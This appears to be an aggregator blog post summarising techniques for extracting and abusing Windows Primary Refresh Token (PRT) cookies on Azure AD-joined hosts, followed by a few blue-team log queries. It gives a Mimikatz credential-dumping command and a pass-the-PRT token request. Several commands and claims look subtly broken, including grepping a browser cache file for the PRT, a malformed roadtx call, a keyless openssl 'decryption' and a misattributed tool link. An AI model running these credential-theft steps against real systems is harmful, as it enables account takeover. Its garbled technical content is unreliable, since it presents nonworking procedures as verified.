An Operator’s Guide to Device-Joined Hosts and the PRT Cookie

By /

Featured Image
URL: posts.specterops.io

You Should Know:

Understanding device-joined hosts and the Primary Refresh Token (PRT) cookie is critical for red teamers, blue teamers, and penetration testers. Below are key commands, techniques, and steps to analyze and exploit PRT cookies in Windows Active Directory environments.

Extracting PRT Cookies

1. Check Azure AD Join Status (Windows):

dsregcmd /status

Look for `AzureAdJoined: YES` in the output.

2. Extract PRT via Browser (Chrome/Edge):

Get-Content "$env:USERPROFILE\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat" | Select-String "PRT"

3. Mimikatz for PRT Extraction (Requires Admin):

mimikatz.exe "privilege::debug" "sekurlsa::cloudap" "exit"

Exploiting PRT for Lateral Movement

1. Pass-the-PRT Attack:

Use tools like ROADTool (https://github.com/Gerenios/ROADTools) to request access tokens:

roadtx request -u <user> -p <password> --prt-cookie <PRT_VALUE>

2. Azure AD Graph API Query:

Invoke-RestMethod -Uri "https://graph.windows.net/me?api-version=1.6" -Headers @{Authorization="Bearer $accessToken"}

Defensive Checks (Blue Team)

1. Monitor PRT Usage:

Get-WinEvent -LogName "Microsoft-Windows-Security-Auditing" | Where-Object {$_.Id -eq 4624}

2. Detect Anomalous Token Requests:

AzureActivity | where OperationName == "Get access token"

Linux-Based PRT Analysis

1. Decrypting PRT with OpenSSL:

openssl enc -d -aes-256-cbc -in prt_cookie.bin -out decrypted_prt.txt

2. Analyzing PRT with Python:

import jwt 
decoded_prt = jwt.decode(prt_cookie, verify=False) 
print(decoded_prt)

What Undercode Say

PRT cookies are a goldmine for attackers in hybrid AD environments. Defenders must monitor Azure AD token requests, enforce Conditional Access Policies, and limit PRT lifetimes. Red teams should abuse PRT for stealthy persistence, while blue teams should hunt for abnormal token usage.

Expected Output:

  • Extracted PRT cookie from WebCacheV01.dat.
  • Azure AD token for lateral movement.
  • Security logs detecting suspicious PRT usage.

Prediction: As cloud adoption grows, PRT-based attacks will surge, pushing Microsoft to enhance PRT security with biometric-based multi-factor authentication (MFA) and shorter token lifespans.

References:

Reported By: Florian Hansemann – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram

Related Posts: